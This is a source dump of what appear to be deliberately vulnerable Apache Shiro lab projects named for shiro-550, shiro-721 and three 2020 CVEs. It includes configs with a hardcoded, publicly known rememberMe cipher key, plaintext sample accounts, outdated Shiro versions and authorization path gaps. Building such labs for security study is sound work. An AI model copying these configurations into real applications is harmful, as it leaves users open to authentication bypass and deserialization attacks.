35 | 36 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/account/index.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | <%@ include file="../include.jsp" %> 20 | 21 | 22 | 23 | "/> 24 | 25 | 26 | 27 |

Users only

28 | 29 |

You are currently logged in.

30 | 31 |

">Return to the home page.

32 | 33 |

" onclick="document.getElementById('logout_form').submit();return false;">Log out.

34 |
" method="post">
35 | 36 | -------------------------------------------------------------------------------- /shiro-721/src/main/webapp/style.css: -------------------------------------------------------------------------------- 1 | /* 2 | * Licensed to the Apache Software Foundation (ASF) under one 3 | * or more contributor license agreements. See the NOTICE file 4 | * distributed with this work for additional information 5 | * regarding copyright ownership. The ASF licenses this file 6 | * to you under the Apache License, Version 2.0 (the 7 | * "License"); you may not use this file except in compliance 8 | * with the License. You may obtain a copy of the License at 9 | * 10 | * http://www.apache.org/licenses/LICENSE-2.0 11 | * 12 | * Unless required by applicable law or agreed to in writing, 13 | * software distributed under the License is distributed on an 14 | * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | * KIND, either express or implied. See the License for the 16 | * specific language governing permissions and limitations 17 | * under the License. 18 | */ 19 | body { 20 | margin: 15px 0 0 15px; 21 | padding: 1px; /*background: #2370cf;*/ 22 | font: 12px 'Lucida Grande', Geneva, Verdana, Arial, sans-serif; 23 | color: #000; 24 | } 25 | 26 | table, td { 27 | font: 12px 'Lucida Grande', Geneva, Verdana, Arial, sans-serif; 28 | color: #000; 29 | } 30 | 31 | h1 { 32 | font: 24px; 33 | } 34 | 35 | img { 36 | border: thin black solid; 37 | } 38 | 39 | #contentBox { 40 | text-align: center; 41 | width: 50%; 42 | margin: auto; 43 | margin-top: 50px; 44 | color: black; 45 | background: #eee; 46 | border: thick black solid; 47 | } -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/style.css: -------------------------------------------------------------------------------- 1 | /* 2 | * Licensed to the Apache Software Foundation (ASF) under one 3 | * or more contributor license agreements. 
See the NOTICE file 4 | * distributed with this work for additional information 5 | * regarding copyright ownership. The ASF licenses this file 6 | * to you under the Apache License, Version 2.0 (the 7 | * "License"); you may not use this file except in compliance 8 | * with the License. You may obtain a copy of the License at 9 | * 10 | * http://www.apache.org/licenses/LICENSE-2.0 11 | * 12 | * Unless required by applicable law or agreed to in writing, 13 | * software distributed under the License is distributed on an 14 | * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | * KIND, either express or implied. See the License for the 16 | * specific language governing permissions and limitations 17 | * under the License. 18 | */ 19 | body { 20 | margin: 15px 0 0 15px; 21 | padding: 1px; /*background: #2370cf;*/ 22 | font: 12px 'Lucida Grande', Geneva, Verdana, Arial, sans-serif; 23 | color: #000; 24 | } 25 | 26 | table, td { 27 | font: 12px 'Lucida Grande', Geneva, Verdana, Arial, sans-serif; 28 | color: #000; 29 | } 30 | 31 | h1 { 32 | font: 24px; 33 | } 34 | 35 | img { 36 | border: thin black solid; 37 | } 38 | 39 | #contentBox { 40 | text-align: center; 41 | width: 50%; 42 | margin: auto; 43 | margin-top: 50px; 44 | color: black; 45 | background: #eee; 46 | border: thick black solid; 47 | } -------------------------------------------------------------------------------- /shiro-550/src/main/java/com/example/shiro550/DemoController.java: -------------------------------------------------------------------------------- 1 | package com.example.shiro550; 2 | 3 | import org.apache.shiro.SecurityUtils; 4 | import org.apache.shiro.authc.AuthenticationException; 5 | import org.apache.shiro.authc.AuthenticationToken; 6 | import org.apache.shiro.authc.UsernamePasswordToken; 7 | import org.apache.shiro.subject.Subject; 8 | import org.springframework.stereotype.Controller; 9 | import org.springframework.web.bind.annotation.*; 10 | 11 | @Controller 12 | public class 
DemoController { 13 | /* Handles the login form POST. Builds a UsernamePasswordToken from the "username" and "password" request parameters and logs the current Subject in; the token's rememberMe flag is true only when the "rememberme" parameter equals "remember-me" (the parameter defaults to ""). Returns "forward:/login" when login throws AuthenticationException, otherwise "forward:/". */ 14 | @PostMapping({"/doLogin"}) 15 | public String doLoginPage(@RequestParam("username") String username, @RequestParam("password") String password, @RequestParam(name = "rememberme", defaultValue = "") String rememberMe) { 16 | Subject subject = SecurityUtils.getSubject(); 17 | try{ 18 | subject.login((AuthenticationToken)new UsernamePasswordToken(username, password, rememberMe.equals("remember-me"))); 19 | }catch (AuthenticationException e) { /* NOTE(review): the failure is neither logged nor counted here, so repeated failed logins leave no trace from this controller; confirm that auditing and throttling happen elsewhere. */ 20 | return "forward:/login"; 21 | } 22 | return "forward:/"; 23 | } 24 | /* Returns the view name "hello" for "/". No HTTP method is given, so the mapping is not limited to GET. */ 25 | @RequestMapping("/") 26 | public String hello(){ 27 | return "hello"; 28 | } 29 | /* Returns the view name "test" for "/test". */ 30 | @RequestMapping("/test") 31 | public String test(){ 32 | return "test"; 33 | } 34 | /* Returns the view name "error" for "/unauth". */ 35 | @RequestMapping({"/unauth"}) 36 | public String errorPage(){ 37 | return "error"; 38 | } 39 | /* Returns the view name "login" for "/login", which is also the target of the failed-login forward in doLoginPage. */ 40 | @RequestMapping({"/login"}) 41 | public String loginPage() { 42 | return "login"; 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /shiro_cve-2020-17523/src/main/java/org/test/springbootshiro/SpringbootShiroApplication.java: -------------------------------------------------------------------------------- 1 | package org.test.springbootshiro; 2 | 3 | import org.springframework.beans.BeansException; 4 | import org.springframework.beans.factory.config.BeanPostProcessor; 5 | import org.springframework.boot.SpringApplication; 6 | import org.springframework.boot.autoconfigure.SpringBootApplication; 7 | import org.springframework.boot.builder.SpringApplicationBuilder; 8 | import org.springframework.boot.web.servlet.support.SpringBootServletInitializer; 9 | import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping; 10 | 11 | /** 12 | * @author jweny 13 | */ 14 | 15 | 16 | 17 | @SpringBootApplication 18 | public class SpringbootShiroApplication extends SpringBootServletInitializer implements BeanPostProcessor { 19 | 20 | @Override 21 | protected SpringApplicationBuilder 
configure(SpringApplicationBuilder builder) { /* Registers this class as the application source when the app is started through SpringBootServletInitializer (deployment in a servlet container). */ 22 | return builder.sources(SpringbootShiroApplication.class); 23 | } 24 | /* Entry point when the application is run directly. */ 25 | public static void main(String[] args) { 26 | 27 | SpringApplication.run(SpringbootShiroApplication.class, args); 28 | } 29 | /* BeanPostProcessor hook, called for each bean before its initialization. For the RequestMappingHandlerMapping bean it switches on alwaysUseFullPath, so Spring MVC looks up handlers by the full path within the web application context instead of the path within the servlet mapping; every other bean is returned untouched. NOTE(review): this changes which URL string Spring matches on. When a Shiro filter chain guards the same routes, check that both layers interpret the request path identically, because a mismatch between them lets a request reach a handler without the intended authorization rule being applied. */ 30 | @Override 31 | public Object postProcessBeforeInitialization(Object bean, String beanName) 32 | throws BeansException { 33 | if (bean instanceof RequestMappingHandlerMapping) { 34 | ((RequestMappingHandlerMapping) bean).setAlwaysUseFullPath(true); 35 | } 36 | return bean; 37 | } 38 | /* No-op: returns the bean unchanged after initialization. */ 39 | @Override 40 | public Object postProcessAfterInitialization(Object bean, String beanName) 41 | throws BeansException { 42 | return bean; 43 | } 44 | } -------------------------------------------------------------------------------- /shiro-721/src/main/webapp/WEB-INF/web.xml: -------------------------------------------------------------------------------- 1 | 2 | 20 | 24 | 25 | 26 | org.apache.shiro.web.env.EnvironmentLoaderListener 27 | 28 | 29 | 30 | ShiroFilter 31 | org.apache.shiro.web.servlet.ShiroFilter 32 | 33 | 34 | 35 | ShiroFilter 36 | /* 37 | 38 | 39 | 40 | index.jsp 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /shiro_cve-2020-17510/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 4.0.0 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 2.2.11.RELEASE 9 | 10 | 11 | com.L4G 12 | spring-shiro 13 | 0.0.1-SNAPSHOT 14 | CVE-2020-17510 15 | Demo project for Spring Boot 16 | 17 | 18 | 1.8 19 | 20 | 21 | 22 | 23 | org.springframework.boot 24 | spring-boot-starter-web 25 | 26 | 27 | org.apache.shiro 28 | shiro-web 29 | 1.6.0 30 | 31 | 32 | org.apache.shiro 33 | shiro-spring 34 | 1.6.0 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | org.springframework.boot 43 | spring-boot-maven-plugin 44 | 45 | 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- 
/shiro-721/target/samples-web-1.4.1/WEB-INF/web.xml: -------------------------------------------------------------------------------- 1 | 2 | 20 | 24 | 25 | 26 | org.apache.shiro.web.env.EnvironmentLoaderListener 27 | 28 | 29 | 30 | ShiroFilter 31 | org.apache.shiro.web.servlet.ShiroFilter 32 | 33 | 34 | 35 | ShiroFilter 36 | /* 37 | 38 | 39 | 40 | index.jsp 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /shiro_cve-2020-1957/src/main/java/org/javaboy/shirobasic/ShiroConfig.java: -------------------------------------------------------------------------------- 1 | package org.javaboy.shirobasic; 2 | 3 | import org.apache.shiro.mgt.SecurityManager; 4 | import org.apache.shiro.spring.web.ShiroFilterFactoryBean; 5 | import org.apache.shiro.web.mgt.DefaultWebSecurityManager; 6 | import org.springframework.context.annotation.Bean; 7 | import org.springframework.context.annotation.Configuration; 8 | 9 | import java.util.LinkedHashMap; 10 | import java.util.Map; 11 | 12 | /** 13 | * @Author 江南一点雨 14 | * @Site www.javaboy.org 2019-06-05 11:16 15 | * 16 | * Shiro is configured here. 17 | * The Shiro configuration mainly consists of 3 beans. 18 | * 19 | * 1. First, provide a Realm instance 20 | * 2. Configure a SecurityManager and set the Realm on it 21 | * 3. 
Configure a ShiroFilterFactoryBean and define the path interception rules and related settings in it 22 | */ 23 | @Configuration 24 | public class ShiroConfig { 25 | @Bean 26 | MyRealm myRealm() { 27 | return new MyRealm(); 28 | } 29 | 30 | @Bean 31 | SecurityManager securityManager() { 32 | DefaultWebSecurityManager manager = new DefaultWebSecurityManager(); 33 | manager.setRealm(myRealm()); 34 | return manager; 35 | } 36 | 37 | @Bean 38 | ShiroFilterFactoryBean shiroFilterFactoryBean() { 39 | ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean(); 40 | // set the SecurityManager 41 | bean.setSecurityManager(securityManager()); 42 | // login page 43 | bean.setLoginUrl("/login"); 44 | // page shown after a successful login 45 | bean.setSuccessUrl("/index"); 46 | // page to redirect to when an unauthorized path is accessed 47 | bean.setUnauthorizedUrl("/unauthorizedurl"); 48 | // configure the path interception rules; note that their order matters 49 | Map map = new LinkedHashMap<>(); 50 | map.put("/doLogin", "anon"); 51 | //map.put("/**", "authc"); 52 | map.put("/hello/*", "authc"); /* NOTE(review): with the catch-all rule above commented out, only /doLogin (anon) and /hello/* (authc) have a filter chain; a path that matches neither pattern is not checked by Shiro at all, and the single * covers one path segment only. Outside a lab setup, end the map with a catch-all authc rule and keep Shiro up to date. */ 53 | bean.setFilterChainDefinitionMap(map); 54 | return bean; 55 | } 56 | } 57 | 58 | -------------------------------------------------------------------------------- /shiro-550/src/main/java/com/example/shiro550/shiro/ShiroConfig.java: -------------------------------------------------------------------------------- 1 | package com.example.shiro550.shiro; 2 | 3 | import java.util.LinkedHashMap; 4 | import java.util.Map; 5 | import org.apache.shiro.mgt.RememberMeManager; 6 | import org.apache.shiro.mgt.SecurityManager; 7 | import org.apache.shiro.realm.Realm; 8 | import org.apache.shiro.spring.web.ShiroFilterFactoryBean; 9 | import org.apache.shiro.web.mgt.CookieRememberMeManager; 10 | import org.apache.shiro.web.mgt.DefaultWebSecurityManager; 11 | import org.springframework.context.annotation.Bean; 12 | import org.springframework.context.annotation.Configuration; 13 | import com.example.shiro550.shiro.MainRealm; 14 | 15 | @Configuration 16 | public class ShiroConfig { 17 | @Bean 18 | MainRealm mainRealm() { 19 | return new MainRealm(); 20 | } 21 | 22 | 
@Bean 23 | RememberMeManager cookieRememberMeManager() { /* Creates the cookie-based remember-me manager with its no-argument constructor. No cipher key is set on it here, so the rememberMe cookie is protected by whatever key the bundled Shiro version sets up by default. NOTE(review): the Shiro version of this sample is not shown in this part of the listing; old Shiro releases shipped one fixed default key for every installation, so configure a unique secret key with setCipherKey(...) and keep Shiro patched. */ 24 | return (RememberMeManager)new CookieRememberMeManager(); 25 | } 26 | /* Builds the web security manager and wires in the realm and the remember-me manager passed in as parameters. NOTE(review): the explicit casts look like decompiler output; they do not change behaviour. */ 27 | @Bean 28 | SecurityManager securityManager(MainRealm mainRealm, RememberMeManager cookieRememberMeManager) { 29 | DefaultWebSecurityManager manager = new DefaultWebSecurityManager(); 30 | manager.setRealm((Realm)mainRealm); 31 | manager.setRememberMeManager(cookieRememberMeManager); 32 | return (SecurityManager)manager; 33 | } 34 | /* Configures the Shiro filter: login URL /login, success URL /hello, an empty unauthorized URL, and a chain map in which /doLogin and /test are anonymous and every other path requires authentication. The LinkedHashMap keeps insertion order and Shiro applies the first matching pattern, so the catch-all entry has to stay last. NOTE(review): the DemoController on this page serves the hello view at "/" and an error view at /unauth, while this bean points at /hello and an empty unauthorized URL; confirm that is intended. */ 35 | @Bean(name = {"shiroFilter"}) 36 | ShiroFilterFactoryBean shiroFilterFactoryBean(SecurityManager securityManager) { 37 | ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean(); 38 | bean.setSecurityManager(securityManager); 39 | bean.setLoginUrl("/login"); 40 | bean.setSuccessUrl("/hello"); 41 | bean.setUnauthorizedUrl(""); 42 | Map map = new LinkedHashMap<>(); 43 | map.put("/doLogin", "anon"); 44 | map.put("/test", "anon"); 45 | map.put("/**", "authc"); 46 | bean.setFilterChainDefinitionMap(map); 47 | return bean; 48 | } 49 | } -------------------------------------------------------------------------------- /shiro_cve-2020-1957/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 4.0.0 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 2.1.5.RELEASE 9 | 10 | 11 | org.javaboy 12 | shiro-basic 13 | 0.0.1-SNAPSHOT 14 | shiro-basic 15 | Demo project for Spring Boot 16 | 17 | 18 | 1.8 19 | 20 | 21 | 22 | 23 | org.springframework.boot 24 | spring-boot-starter-web 25 | 26 | 27 | org.apache.shiro 28 | shiro-web 29 | 1.4.2 30 | 31 | 32 | org.apache.shiro 33 | shiro-spring 34 | 1.4.2 35 | 36 | 37 | org.springframework.boot 38 | spring-boot-starter-test 39 | test 40 | 41 | 42 | 43 | 44 | 45 | 46 | org.springframework.boot 47 | spring-boot-maven-plugin 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /shiro-721/target/classes/log4j.properties: 
-------------------------------------------------------------------------------- 1 | # 2 | # Licensed to the Apache Software Foundation (ASF) under one 3 | # or more contributor license agreements. See the NOTICE file 4 | # distributed with this work for additional information 5 | # regarding copyright ownership. The ASF licenses this file 6 | # to you under the Apache License, Version 2.0 (the 7 | # "License"); you may not use this file except in compliance 8 | # with the License. You may obtain a copy of the License at 9 | # 10 | # http://www.apache.org/licenses/LICENSE-2.0 11 | # 12 | # Unless required by applicable law or agreed to in writing, 13 | # software distributed under the License is distributed on an 14 | # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | # KIND, either express or implied. See the License for the 16 | # specific language governing permissions and limitations 17 | # under the License. 18 | # 19 | # This file is used to format all logging output 20 | log4j.rootLogger=TRACE, stdout 21 | 22 | log4j.appender.stdout=org.apache.log4j.ConsoleAppender 23 | log4j.appender.stdout.layout=org.apache.log4j.PatternLayout 24 | log4j.appender.stdout.layout.ConversionPattern=%d %-5p [%c]: %m%n 25 | 26 | # ============================================================================= 27 | # 3rd Party Libraries 28 | # OFF, FATAL, ERROR, WARN, INFO, DEBUG, ALL 29 | # ============================================================================= 30 | # ehcache caching manager: 31 | log4j.logger.net.sf.ehcache=WARN 32 | 33 | # Most all Apache libs: 34 | log4j.logger.org.apache=WARN 35 | 36 | # Quartz Enterprise Scheular (java 'cron' utility) 37 | log4j.logger.org.quartz=WARN 38 | 39 | # ============================================================================= 40 | # Apache Shiro 41 | # ============================================================================= 42 | # Shiro security framework 43 | log4j.logger.org.apache.shiro=TRACE 44 | 
#log4j.logger.org.apache.shiro.realm.text.PropertiesRealm=INFO 45 | #log4j.logger.org.apache.shiro.cache.ehcache.EhCache=INFO 46 | #log4j.logger.org.apache.shiro.io=INFO 47 | #log4j.logger.org.apache.shiro.web.servlet=INFO 48 | log4j.logger.org.apache.shiro.util.ThreadContext=INFO 49 | -------------------------------------------------------------------------------- /shiro-721/src/main/resources/log4j.properties: -------------------------------------------------------------------------------- 1 | # 2 | # Licensed to the Apache Software Foundation (ASF) under one 3 | # or more contributor license agreements. See the NOTICE file 4 | # distributed with this work for additional information 5 | # regarding copyright ownership. The ASF licenses this file 6 | # to you under the Apache License, Version 2.0 (the 7 | # "License"); you may not use this file except in compliance 8 | # with the License. You may obtain a copy of the License at 9 | # 10 | # http://www.apache.org/licenses/LICENSE-2.0 11 | # 12 | # Unless required by applicable law or agreed to in writing, 13 | # software distributed under the License is distributed on an 14 | # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | # KIND, either express or implied. See the License for the 16 | # specific language governing permissions and limitations 17 | # under the License. 
18 | # 19 | # This file is used to format all logging output 20 | log4j.rootLogger=TRACE, stdout 21 | 22 | log4j.appender.stdout=org.apache.log4j.ConsoleAppender 23 | log4j.appender.stdout.layout=org.apache.log4j.PatternLayout 24 | log4j.appender.stdout.layout.ConversionPattern=%d %-5p [%c]: %m%n 25 | 26 | # ============================================================================= 27 | # 3rd Party Libraries 28 | # OFF, FATAL, ERROR, WARN, INFO, DEBUG, ALL 29 | # ============================================================================= 30 | # ehcache caching manager: 31 | log4j.logger.net.sf.ehcache=WARN 32 | 33 | # Most all Apache libs: 34 | log4j.logger.org.apache=WARN 35 | 36 | # Quartz Enterprise Scheduler (java 'cron' utility) 37 | log4j.logger.org.quartz=WARN 38 | 39 | # ============================================================================= 40 | # Apache Shiro 41 | # ============================================================================= 42 | # Shiro security framework (TRACE is the most verbose level; NOTE(review): check what Shiro writes at this level before reusing this file outside a test setup, and lower the level there) 43 | log4j.logger.org.apache.shiro=TRACE 44 | #log4j.logger.org.apache.shiro.realm.text.PropertiesRealm=INFO 45 | #log4j.logger.org.apache.shiro.cache.ehcache.EhCache=INFO 46 | #log4j.logger.org.apache.shiro.io=INFO 47 | #log4j.logger.org.apache.shiro.web.servlet=INFO 48 | log4j.logger.org.apache.shiro.util.ThreadContext=INFO 49 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/classes/log4j.properties: -------------------------------------------------------------------------------- 1 | # 2 | # Licensed to the Apache Software Foundation (ASF) under one 3 | # or more contributor license agreements. See the NOTICE file 4 | # distributed with this work for additional information 5 | # regarding copyright ownership. The ASF licenses this file 6 | # to you under the Apache License, Version 2.0 (the 7 | # "License"); you may not use this file except in compliance 8 | # with the License. 
You may obtain a copy of the License at 9 | # 10 | # http://www.apache.org/licenses/LICENSE-2.0 11 | # 12 | # Unless required by applicable law or agreed to in writing, 13 | # software distributed under the License is distributed on an 14 | # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | # KIND, either express or implied. See the License for the 16 | # specific language governing permissions and limitations 17 | # under the License. 18 | # 19 | # This file is used to format all logging output 20 | log4j.rootLogger=TRACE, stdout 21 | 22 | log4j.appender.stdout=org.apache.log4j.ConsoleAppender 23 | log4j.appender.stdout.layout=org.apache.log4j.PatternLayout 24 | log4j.appender.stdout.layout.ConversionPattern=%d %-5p [%c]: %m%n 25 | 26 | # ============================================================================= 27 | # 3rd Party Libraries 28 | # OFF, FATAL, ERROR, WARN, INFO, DEBUG, ALL 29 | # ============================================================================= 30 | # ehcache caching manager: 31 | log4j.logger.net.sf.ehcache=WARN 32 | 33 | # Most all Apache libs: 34 | log4j.logger.org.apache=WARN 35 | 36 | # Quartz Enterprise Scheular (java 'cron' utility) 37 | log4j.logger.org.quartz=WARN 38 | 39 | # ============================================================================= 40 | # Apache Shiro 41 | # ============================================================================= 42 | # Shiro security framework 43 | log4j.logger.org.apache.shiro=TRACE 44 | #log4j.logger.org.apache.shiro.realm.text.PropertiesRealm=INFO 45 | #log4j.logger.org.apache.shiro.cache.ehcache.EhCache=INFO 46 | #log4j.logger.org.apache.shiro.io=INFO 47 | #log4j.logger.org.apache.shiro.web.servlet=INFO 48 | log4j.logger.org.apache.shiro.util.ThreadContext=INFO 49 | -------------------------------------------------------------------------------- /shiro-721/src/main/webapp/WEB-INF/shiro.ini: 
-------------------------------------------------------------------------------- 1 | # 2 | # Licensed to the Apache Software Foundation (ASF) under one 3 | # or more contributor license agreements. See the NOTICE file 4 | # distributed with this work for additional information 5 | # regarding copyright ownership. The ASF licenses this file 6 | # to you under the Apache License, Version 2.0 (the 7 | # "License"); you may not use this file except in compliance 8 | # with the License. You may obtain a copy of the License at 9 | # 10 | # http://www.apache.org/licenses/LICENSE-2.0 11 | # 12 | # Unless required by applicable law or agreed to in writing, 13 | # software distributed under the License is distributed on an 14 | # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | # KIND, either express or implied. See the License for the 16 | # specific language governing permissions and limitations 17 | # under the License. 18 | 19 | # INI configuration is very powerful and flexible, while still remaining succinct. 20 | # Please http://shiro.apache.org/configuration.html and 21 | # http://shiro.apache.org/web.html for more. 22 | 23 | [main] 24 | listener = org.apache.shiro.config.event.LoggingBeanEventListener 25 | 26 | shiro.loginUrl = /login.jsp 27 | shiro.postOnlyLogout = true 28 | 29 | sessionManager = org.apache.shiro.web.session.mgt.DefaultWebSessionManager 30 | securityManager.sessionManager = $sessionManager 31 | securityManager.sessionManager.sessionIdUrlRewritingEnabled = false 32 | 33 | # We need to set the cipherKey, if you want the rememberMe cookie to work after restarting or on multiple nodes. 
34 | # YOU MUST SET THIS TO A UNIQUE STRING. The value below is the sample key committed with this file; whoever knows the key can produce rememberMe cookies that the application accepts, so generate your own random key and keep it out of version control. 35 | securityManager.rememberMeManager.cipherKey = kPH+bIxk5D2deZiIxcaaaA== 36 | 37 | [users] 38 | # format: username = password, role1, role2, ..., roleN (sample accounts with plaintext passwords; replace them before any real deployment) 39 | root = secret,admin 40 | guest = guest,guest 41 | presidentskroob = 12345,president 42 | darkhelmet = ludicrousspeed,darklord,schwartz 43 | lonestarr = vespa,goodguy,schwartz 44 | 45 | [roles] 46 | # format: roleName = permission1, permission2, ..., permissionN 47 | admin = * 48 | schwartz = lightsaber:* 49 | goodguy = winnebago:drive:eagle5 50 | 51 | [urls] 52 | # The /login.jsp is not restricted to authenticated users (otherwise no one could log in!), but 53 | # the 'authc' filter must still be specified for it so it can process that url's 54 | # login submissions. It is 'smart' enough to allow those requests through as specified by the 55 | # shiro.loginUrl above. 56 | /login.jsp = authc 57 | /logout = logout 58 | /account/** = authc 59 | /remoting/** = authc, roles[b2bClient], perms["remote:invoke:lan,wan"] -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/shiro.ini: -------------------------------------------------------------------------------- 1 | # 2 | # Licensed to the Apache Software Foundation (ASF) under one 3 | # or more contributor license agreements. See the NOTICE file 4 | # distributed with this work for additional information 5 | # regarding copyright ownership. The ASF licenses this file 6 | # to you under the Apache License, Version 2.0 (the 7 | # "License"); you may not use this file except in compliance 8 | # with the License. You may obtain a copy of the License at 9 | # 10 | # http://www.apache.org/licenses/LICENSE-2.0 11 | # 12 | # Unless required by applicable law or agreed to in writing, 13 | # software distributed under the License is distributed on an 14 | # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | # KIND, either express or implied. 
See the License for the 16 | # specific language governing permissions and limitations 17 | # under the License. 18 | 19 | # INI configuration is very powerful and flexible, while still remaining succinct. 20 | # Please http://shiro.apache.org/configuration.html and 21 | # http://shiro.apache.org/web.html for more. 22 | 23 | [main] 24 | listener = org.apache.shiro.config.event.LoggingBeanEventListener 25 | 26 | shiro.loginUrl = /login.jsp 27 | shiro.postOnlyLogout = true 28 | 29 | sessionManager = org.apache.shiro.web.session.mgt.DefaultWebSessionManager 30 | securityManager.sessionManager = $sessionManager 31 | securityManager.sessionManager.sessionIdUrlRewritingEnabled = false 32 | 33 | # We need to set the cipherKey, if you want the rememberMe cookie to work after restarting or on multiple nodes. 34 | # YOU MUST SET THIS TO A UNIQUE STRING 35 | securityManager.rememberMeManager.cipherKey = kPH+bIxk5D2deZiIxcaaaA== 36 | 37 | [users] 38 | # format: username = password, role1, role2, ..., roleN 39 | root = secret,admin 40 | guest = guest,guest 41 | presidentskroob = 12345,president 42 | darkhelmet = ludicrousspeed,darklord,schwartz 43 | lonestarr = vespa,goodguy,schwartz 44 | 45 | [roles] 46 | # format: roleName = permission1, permission2, ..., permissionN 47 | admin = * 48 | schwartz = lightsaber:* 49 | goodguy = winnebago:drive:eagle5 50 | 51 | [urls] 52 | # The /login.jsp is not restricted to authenticated users (otherwise no one could log in!), but 53 | # the 'authc' filter must still be specified for it so it can process that url's 54 | # login submissions. It is 'smart' enough to allow those requests through as specified by the 55 | # shiro.loginUrl above. 
56 | /login.jsp = authc 57 | /logout = logout 58 | /account/** = authc 59 | /remoting/** = authc, roles[b2bClient], perms["remote:invoke:lan,wan"] -------------------------------------------------------------------------------- /shiro-721/src/test/java/org/apache/shiro/test/ContainerIntegrationIT.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Licensed to the Apache Software Foundation (ASF) under one 3 | * or more contributor license agreements. See the NOTICE file 4 | * distributed with this work for additional information 5 | * regarding copyright ownership. The ASF licenses this file 6 | * to you under the Apache License, Version 2.0 (the 7 | * "License"); you may not use this file except in compliance 8 | * with the License. You may obtain a copy of the License at 9 | * 10 | * http://www.apache.org/licenses/LICENSE-2.0 11 | * 12 | * Unless required by applicable law or agreed to in writing, 13 | * software distributed under the License is distributed on an 14 | * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | * KIND, either express or implied. See the License for the 16 | * specific language governing permissions and limitations 17 | * under the License. 
18 | */ 19 | package org.apache.shiro.test; 20 | 21 | import com.gargoylesoftware.htmlunit.ElementNotFoundException; 22 | import com.gargoylesoftware.htmlunit.FailingHttpStatusCodeException; 23 | import com.gargoylesoftware.htmlunit.WebClient; 24 | import com.gargoylesoftware.htmlunit.html.HtmlForm; 25 | import com.gargoylesoftware.htmlunit.html.HtmlInput; 26 | import com.gargoylesoftware.htmlunit.html.HtmlPage; 27 | import org.apache.shiro.testing.web.AbstractContainerIT; 28 | import org.junit.Before; 29 | import org.junit.Test; 30 | 31 | import java.io.IOException; 32 | import java.net.MalformedURLException; 33 | /* Container integration test that drives the sample web application through an HtmlUnit WebClient. getBaseUri() is inherited from AbstractContainerIT, which is not shown here. */ 34 | public class ContainerIntegrationIT extends AbstractContainerIT { 35 | 36 | protected final WebClient webClient = new WebClient(); 37 | /* Runs before each test: opens the home page and clicks the /logout link if there is one. */ 38 | @Before 39 | public void logOut() throws IOException { 40 | // Make sure we are logged out 41 | final HtmlPage homePage = webClient.getPage(getBaseUri()); 42 | try { 43 | homePage.getAnchorByHref("/logout").click(); 44 | } 45 | catch (ElementNotFoundException e) { 46 | // Ignore: no /logout link was found, which this test treats as already logged out 47 | } 48 | } 49 | /* Logs in through login.jsp with the sample account root/secret (listed under [users] in the sample shiro.ini on this page) and passes if the resulting page has a /logout link. */ 50 | @Test 51 | public void logIn() throws FailingHttpStatusCodeException, MalformedURLException, IOException, InterruptedException { 52 | 53 | HtmlPage page = webClient.getPage(getBaseUri() + "login.jsp"); 54 | HtmlForm form = page.getFormByName("loginform"); 55 | form.getInputByName("username").setValueAttribute("root"); 56 | form.getInputByName("password").setValueAttribute("secret"); 57 | page = form.getInputByName("submit").click(); 58 | // This'll throw an exception if not logged in 59 | page.getAnchorByHref("/logout"); 60 | } 61 | } 62 | -------------------------------------------------------------------------------- /shiro-550/src/main/resources/templates/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Login Page 6 | 7 | 68 | 69 | 70 | 83 | 84 | 85 | -------------------------------------------------------------------------------- 
